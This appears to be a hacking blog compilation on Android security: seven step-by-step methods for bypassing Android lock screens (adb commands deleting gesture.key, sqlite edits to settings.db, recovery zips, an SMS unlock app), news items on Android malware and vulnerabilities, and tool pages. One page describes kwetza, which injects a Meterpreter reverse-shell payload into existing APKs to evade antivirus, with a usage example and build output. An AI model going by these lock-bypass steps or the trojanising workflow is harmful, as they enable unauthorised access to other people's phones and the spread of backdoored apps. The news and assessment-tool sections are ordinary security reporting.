Bypass Android Pattern Lock

  

METHOD I

Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed:

INSTRUCTIONS:

1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
(using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 2

Solution For Everyone Without Recovery Installed – ADB:

What You Need:
=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed

How to install adb:
1. Open Terminal
2. Type:

“sudo apt-get install android-tools-adb”
-> Hit [Enter]

3. Follow the instructions until everything is installed.

INSTRUCTIONS:

1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type:

adb devices
adb shell
cd data/system
su
rm *.key

4. Done.. Now You Just Have To Reboot.

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 3

Solution For Everyone Before Lock Accident :

SMS Bypass – Download Link – Install It On Your Device (Download from attachments)
This App Allows You To Remotely Bypass Your Phone’s Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.

INSTRUCTIONS:

1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:

secret_code reset

Example:

1234 reset

Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset – Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 4

Solution For Everyone Via Adb – SQL Command :

INSTRUCTIONS:
=>Type This Commands Separated In Your Terminal (CMD Prompt) :

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock’;
update system set value=0 where name=’lockscreen.lockedoutpermanently’;
.quit

=>Now You Just Have To Reboot.

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 5

Solution For Everyone Via Adb – File Removal :

INSTRUCTIONS:

=>Type This Command In Your Terminal (CMD Prompt) :

adb shell rm /data/system/gesture.key

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 6

Solution For Everyone With USB Debugging Enabled :

INSTRUCTIONS:

Primary Step for all method:

Download & Extract to anywhere – Bypass Security Hack (Download from attachments)
Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
Navigate to Browse data tab, At table there, click to list down the selection & select secure.

Instruction To Remove Pattern Lock:

Now, find lock_pattern_autolock, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:

Now, Find Or Create lockscreen.password_type, double-click & change it’s value to 65536, Apply changes!
Now, find lock_pattern_autolock, Delete Record, If doesn’t exist, Ignore
Close & save database
Run push settings.db.cmd and reboot your phone

Instruction To Remove Password Lock:

Now, find lockscreen.password_salt, Delete Record
Now, find lockscreen.password_type, Delete Record
Close & save database
Run push settings.db.cmd and reboot your phone

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 7

Solution For Everyone With Recovery Installed :

INSTRUCTIONS:

1.Download and Copy Aroma File manager.zip (Download from attachments) to your memory card.

2. Open your recovery (press volume Down + Power button or it can be different according to the phones. Generally the phones who have pressable button on the middle they have to press all three buttons. Google for you pattern there are lots)

3. There’ll b an option in recovery called “mount”. Go in that option and then mount all the cache and everything it is there.

4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded using above QR code above.

5. After Flashing or updating, the aroma file manager will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.

6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.

7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manager.

8. Now after exit, re-update that aroma file again and it will open again.

9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.

Note: If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

Google Removes Around 500 Malicious Apps From Play Store

Google Removes Around 500 Malicious Apps From Play Store

CyberSecurity Company Lookout researched on Android Apps and found around 500 Malicious apps on Google Play store. Theses apps are being used to Spy on users.

Security research company Lookout said, The Lookout Security Intelligence team has discovered an advertising software development kit (SDK) called Igexin that had the capability of spying on victims through otherwise benign apps by downloading malicious plugins. Over 500 apps available on Google Play used the Igexin ad SDK. While not all of these applications have been confirmed to download the malicious spying capability, Igexin could have introduced that functionality at their convenience. Apps containing the affected SDK were downloaded over 100 million times across the Android ecosystem.

Company observed an app downloading large, encrypted files after making a series of initial requests to a REST API at http://sdk[.]open[.]phone[.]igexin.com/api.php, which is an endpoint used by the Igexin ad SDK.

This sort of traffic is often the result of malware that downloads and executes code after an initially "clean" app is installed, in order to evade detection. The encrypted file downloads and the presence of calls within the com.igexin namespace to Android's dalvik.system.DexClassLoader(used to load classes from a .jar or .apk file) were enough to warrant more in-depth analysis for possible malware hiding in its payload.  

Not all versions of the Igexin ad SDK deliver malicious functionality. The malicious versions implement a plugin framework that allows the client to load arbitrary code, as directed by responses to requests made to a REST API endpoint hosted at http://sdk[.]open[.]phone[.]igexin[.]com/api.php.

By using this SDK, Cybercriminals are developing Malwares to spy on mobile users and other devices by injecting the malicious code into Vulnerable apps.

As soon as Google got to know about these Malicious Apps, Google instantly removed it from Play Store.

And one major issue here was users were not able to identify that they have become victims of this Malvertising.

Company introduced Google Play Protect to secure an Android Application that automatically scans APK before users install it into their devices. Google always keeps trying to keep malicious apps out of the Play Store. Hope the upcoming Google Android Oreo will offer more protection to its users.

New Android Malware GhostCtrl Can Take Full Control Of Your Phone

New Android Malware GhostCtrl Can Take Full Control Of Your Phone

• This Malware infects Android devices and it spreads via Apps like Whatsapp, MMS and even Pokeman GO. 
• It steals Call Logs, SMS, Contacts, Location and more Mobile activities.
• It can access your Phone Camera or record Audio. 

The Trend Micro security researchers warns of New Android Malware called GhostCtrl and its variant of the OmniRAT was found in year of 2015 which was known for remotely taking control of many OS including Linux, Mac and Windows with the touch of an Android device’s button.

How it Infects?

The APK forces the user to install the malicious app, when user tries to cancel the installation, the APK will keep displaying the prompt. According to report, When the app is launched, its base64-decodes a string from the resource file and writes it down, which is actually the malicious Android Application Package (APK).

How To Protect?

• Always Keep the device updated: Android patching is fragmented and organizations may have custom requirements or configurations needed to keep the device updated, so enterprises need to balance productivity and security
• Apply the principle of least privilege—restrict user permissions for BYOD devices to prevent unauthorized access and installation of dubious apps
• Implement an app reputation system that can detect and block malicious and suspicious apps
• Deploy firewalls, intrusion detection, and prevention systems at both the endpoint and mobile device levels to preempt the malware’s malicious network activities
• Enforce and strengthen your mobile device management policies to further reduce potential security risks
• Employ encryption, network segmentation and data segregation to limit further exposure or damage to data
• Regularly back up data in case of device loss, theft, or malicious encryption.

Millions of Android Devices Using Broadcom Wi-Fi Chip Can Be Hacked Remotely

Google has released its latest monthly security update for Android devices, including a serious bug in some Broadcom Wi-Fi chipsets that affects millions of Android devices, as well as some iPhone models.

Dubbed BroadPwn, the critical remote code execution vulnerability resides in Broadcom's BCM43xx family of WiFi chipsets, which can be triggered remotely without user interaction, allows a remote attacker to execute malicious code on targeted Android devices with kernel privileges.

"The most severe vulnerability in this [runtime] section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of an unprivileged process," Google describes in the July 2017 Android Security Bulletin.

The BroadPwn vulnerability (CVE-2017-3544) has been discovered by Exodus Intelligence researcher Nitay Artenstein, who says the flawed Wi-Fi chipset also impacts Apple iOS devices.

Since Artenstein will be presenting his finding at Black Hat 2017 event, details about the BroadPwn bug is scarce at this moment.

"The Broadcom BCM43xx family of Wi-Fi chips is found in an extraordinarily wide range of mobile devices – from various iPhone models to HTC, LG, Nexus and practically the full range of Samsung flagship devices," the abstract for Artenstein's talk says.

Besides the fix for the BroadPwn vulnerability, July's Android Security Bulletin includes patches for 10 critical, which are all remote code execution bugs, 94 high and 32 moderate rated vulnerabilities.

Two months ago, an over-the-air hijacking vulnerability was discovered in Broadcom WiFi SoC (Software-on-Chip) chips, allowing attackers within the same WiFi network to remotely hack, iPhones, iPads, iPods and Android handsets without any user interaction.


At that time, Apple rushed out an emergency iOS patch update to address the serious bug, and Google addressed the flaw in its Android April 2017 security updates.

Android Security Bulletin: July 2017 Updates

Among the other critical flaws is a long list of vulnerabilities in the Mediaserver process in the Android operating system, which also allows attackers to perform remote code execution on the affected devices.

One of the vulnerabilities is an issue with the way the framework handles some specific files. The libhevc library has an input validation vulnerability (CVE-2017-0540), which can be exploited using a crafted file.

"A remote code execution vulnerability in libhevc in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing," the vulnerability description says. 

"This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process."

The over-the-air updates and firmware for Google devices have already been issued by the company for its Pixel and Nexus devices, though rest of Android still need to wait for an update from their OEMs, leaving million of Android devices vulnerable for next few months.

kwetza - To Inject Android Applications With A Meterpreter Payload

kwetza - To Inject Android Applications With A Meterpreter Payload.

The Python script to inject existing Android applications with a Meterpreter payload.

What does it do?

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.

Getting the code

Firstly get the code:

git clone https://github.com/sensepost/kwetza.git

Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:

pip install beautifulsoup4

Kwetza requires Apktool to be install and accessible via your PATH. This can be setup using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage

python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no

• nameOfTheApkToInfect.apk =name of the APK you wish to infect.
• LHOST =IP of your listener.
• LPORT =Port of your listener.
• yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.

python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED


[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Information

Kwetza has been developed to work with Python 2.

Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.

If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.

The same can be done for payload templates.
The password for the default keystore is, well, "password".

Download Kwetza

Inspeckage - The Android Package Inspector For Dynamic Analysis With API Hooks

Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. 

Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.

Features

With Inspeckage, we can get a good amount of information about the application's behavior:

Information gathering

• Requested Permissions;
• App Permissions;
• Shared Libraries;
• Exported and Non-exported Activities, Content Providers,Broadcast Receivers and Services;
• Check if the app is debuggable or not;
• Version, UID and GIDs;
• etc.

Hooks (so far)

With the hooks, we can see what the application is doing in real time:

• Shared Preferences (log and file);
• Serialization;
• Crypto;
• Hashes;
• SQLite;
• HTTP (an HTTP proxy tool is still the best alternative);
• File System;
• Miscellaneous (Clipboard, URL.Parse());
• WebView;
• IPC;
• + Hooks (add new hooks dynamically)

Actions

With Xposed it's possible to perform actions such as start a unexported activity and much else:

• Start any activity (exported and unexported);
• Call any provider (exported and unexported);
• Disable FLAG_SECURE;
• SSL uncheck (bypass certificate pinning - JSSE, Apache and okhttp3);
• Start, stop and restart the application;

Extras

• APK Download;
• View the app's directory tree;
• Download the app's files;
• Download the output generated by hooks in text file format;
• Take a screen capture;
• Send text to android clipboard.

Configuration

Even though our tool has some hooks to the HTTP libraries, using an external proxy tool is still the best option to analyze the app's traffic. With Inspeckage, you can:

• Add a proxy to the target app;
• Enable and disable proxy;
• Add entries in the arp table.

Logcat

Logcat.html page. A experimental page with websocket to show some information from the logcat.

Installation

Requirements: Xposed Framework

Xposed Installer

1. Go to Xposed Installer, select "Download"
2. Refresh and search for "Inspeckage"
3. Download the latest version and install
4. Enable it in Xposed
5. Reboot and enjoy!

Xposed Repository

Get it from Xposed repo: http://repo.xposed.info/module/mobi.acpm.inspeckage

 adb install mobi.acpm.inspeckage.apk

• Enable it in Xposed
• Reboot and enjoy!

Download

• Replace params and return value (+Hooks tab).

LazyDroid: Bash Script Tool For Android Application Assessment

LazyDroid: Bash Script Tool For Android Application Assessment

Lazydroid is a tool written as a bash script to facilitate some aspects of an Android Assessment. 

It provides some common tasks such as:

• Set the debug flag of an application to true
• Set the backup flag of an application to true
• Re-Build the application
• Re-Sign the application
• Smart log extraction of an application
• Extract the APK of an application installed from Google Play
• Download any mobile folder (/sdcard/, application data folder, other)
• Compare two different snapshots of the same folder
• Insert Frida gadget in the APK (for example when the phone is not or cannot be rooted, and thus Frida server cannot be run)

Installation

Lazydroid requires Linux or Mac OS to run and the next tools installed:

• apktool
• jarsigner
• adb
• aapt (Android Asset Packaging Tool, part of the SDK)
• your keystore and alias
• Frida Agent (pip install frida)

To run lazydroid.sh the steps would be the following:

$ git clone
$ #configure the path to the tools (adb, jarsigner, apktool, etc and your favorite shell)
$ cd lazydroid
$ ./getfridalibs.sh #get the last frida libs for Android
$ ./lazydroid.sh

Download LazyDroid

New Mobile Ransomware Alert Similar Like WannaCry

New Mobile Ransomware Alert Similar Like WannaCry

Newly Detected Mobile Ransomware By Avast Security researchers as "WannaLocker". It is spreading through Chinese gaming forums. 

The Mobile Ransomware is imitating a plugin for the popular Chinese game King of Glory, which is how victims are being tricked into downloading the Ransomware.

China Hackers have developed a copycat version of WannaCry Ransomware to Target Android users. This ransomware works similar as WannaCry, it locks your mobile and asks to pay the Ransom.

Cybercriminals are spreading WannaLocker for Chinese Android users by encrypting files on the infected device's external storage. After infecting the mobile device, WannaLocker hides its app icon and changes the home screen Wallpaper to an Anime image.

To unlock ransom demands of 40 yuan (Approx $6) and demanded ransom in Chinese Payment methods like AliPay, QQ and WEChat.

How To Protect?

• To protect your phone and valuable photos, videos, contacts stored on it from Ransomware.
• Make sure you frequently backup your data and install antivirus on all of your devices.
• Do not click unknown Link.

Previous, WannaCry Ransomware is affecting computers worldwide. It becomes the biggest Cyber Threat worldwide.

Approx 200,000 computers and 150 countries hit till now. Which including companies and National Health service. Some of the organisation didn't update their system that's the reason their systems are vulnerable to Ransomware attack.